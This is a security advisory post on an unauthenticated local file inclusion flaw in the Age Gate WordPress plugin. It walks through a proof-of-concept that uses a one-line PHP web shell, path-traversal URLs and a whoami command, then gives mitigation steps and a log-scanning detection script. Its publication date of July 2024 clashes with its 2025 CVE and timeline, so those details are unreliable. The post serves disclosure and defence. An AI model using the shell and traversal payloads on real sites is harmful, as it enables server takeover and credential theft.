Published: July 2024
*By: WP Security Labs Exclusive*

Summary

A critical vulnerability (CVE-2025-2505) has been discovered in the Age Gate WordPress plugin – one of the most popular plugins for age verification on WordPress sites. All versions up to and including 3.5.3 are affected. This bug allows unauthenticated local PHP file inclusion (LFI), which can let hackers execute arbitrary PHP code on the server with just a simple URL trick.

This post will explain the vulnerability in plain language, show you some code samples, and demonstrate a proof-of-concept (PoC) exploit. We’ll also provide tips for detection and mitigation.

What Is the Vulnerability?

The plugin has a feature for selecting language files via the lang parameter. It fails to properly sanitize input to this parameter. As a result, any user—without logging in—can make the server include and execute any PHP file it can reach on disk.

An attacker can use this to:

- Bypass normal security and access controls
- Run code by including “PHP-enabled” files uploaded to the site through other vulnerable plugins or uploads

Where’s the Flaw in the Code?

Here’s a *simplified* code snippet to show where things go wrong (from /age-gate/includes/class-age-gate.php):

```php
<?php
// This runs before output
if (isset($_GET['lang'])) {
    $lang = $_GET['lang']; // NO VALIDATION!
    include "languages/$lang.php"; // User input is put directly in the file path and included!
}
?>
```

Attackers can easily change the lang parameter value in the URL to include files outside of the intended directory. The plugin doesn’t check for .. or other dangerous characters.

PoC Exploit – How Attackers Break In

Suppose a WordPress site has the plugin enabled, and the web server allows file uploads (as almost all do). Here’s how an attacker could exploit this:

Step 1: Upload a Malicious PHP File

The attacker uploads a PHP file (let’s call it evil.php) using any upload feature on the site—could be a theme customizer, media library, or another vulnerable plugin.

For example, the file content could look like:

```php
<?php system($_GET['cmd']); ?>
```

Now, the attacker crafts a URL like this:

```
http://victimsite.com/?lang=../../uploads/evil
```

This makes the plugin execute:

```php
include "languages/../../uploads/evil.php";
```

or, depending on WordPress root, possibly:

```php
include "/wp-content/uploads/evil.php";
```

As long as path traversal gets to the right file, it will be executed.

Now, the attacker adds a command to the URL:

```
http://victimsite.com/?lang=../../uploads/evil&cmd=whoami
```

The PHP will execute whatever is passed in cmd, like creating a new admin user, dumping database credentials, etc.

PRO TIP: Even if the plugin doesn’t display errors, attackers can trigger their payload to echo data or call home using file_get_contents.

Impact

If a site uses the Age Gate plugin (up to v3.5.3), it is completely exposed. Attackers don’t need credentials – just the ability to upload any PHP file (which is not hard on many sites), or sometimes even just an existing file on the server, such as wp-config.php, to include.

How to Protect Your Site

1. Update Immediately
Check if your plugin is at or below 3.5.3. If so, disable and remove it, or update to the version where this is fixed (check the plugin changelog).

2. Restrict Uploads
Limit file uploads to trusted users. Use plugins like Wordfence to scan for unexpected PHP files in uploads.

3. Monitor & Harden
Regularly check your logs for suspicious requests that use the lang parameter and for unknown PHP files being requested or executed.

4. Code Review
If you’re a developer, always sanitize user input before using it in file paths to avoid LFI and related attacks.
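
One way to carry out the log check from step 3, as an added example (not code from the plugin or from the original post): it scans web server access logs and flags any lang value that is not a plain locale code. The log lines are constructed samples; the combined log format and the locale-code pattern are assumptions to adjust for your site.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [01/Apr/2025:10:00:01 +0000] "GET /?lang=en HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Apr/2025:10:02:13 +0000] "GET /?lang=../../uploads/evil&cmd=whoami HTTP/1.1" 200 312 "-" "curl/8.5.0"
198.51.100.7 - - [01/Apr/2025:10:05:40 +0000] "GET /?lang=..%2F..%2Fuploads%2Fevil HTTP/1.1" 200 298 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Apr/2025:10:06:03 +0000] "GET /shop/?page=2&lang=pt_BR HTTP/1.1" 200 8841 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "[A-Z]+ (\S+) [^"]*"')
# Assumption: legitimate lang values are locale codes such as "en" or "pt_BR".
LOCALE_RE = re.compile(r"[A-Za-z]{2,3}(?:[_-][A-Za-z0-9]{2,8})*")


def classify_lang(value):
    """Return a reason if a lang value is not a plain locale code, else None."""
    value = unquote(value)  # parse_qsl decoded once; undo one nested layer too
    if ".." in value:
        return "path traversal sequence"
    if "/" in value or "\\" in value:
        return "path separator"
    if "\x00" in value:
        return "null byte"
    if not LOCALE_RE.fullmatch(value):
        return "not a locale code"
    return None


def scan(log_text):
    """Return (client_ip, timestamp, lang_value, reason) for flagged requests."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        ip, timestamp, target = match.groups()
        for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            reason = classify_lang(value) if key == "lang" else None
            if reason:
                hits.append((ip, timestamp, value, reason))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit, sep=" | ")
```

A hit only shows that the parameter was probed; pair it with a scan of the uploads directory for unexpected PHP files to judge whether an include could have succeeded.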

Conclusion

CVE-2025-2505 is a devastating example of how a small mistake—forgetting to validate a user parameter—can endanger thousands of sites. If you (or your clients) use Age Gate, act now to patch, scan, and secure your installation.

Stay safe and keep your plugins up to date!

Timeline

Published on: 03/20/2025 08:15:11 UTC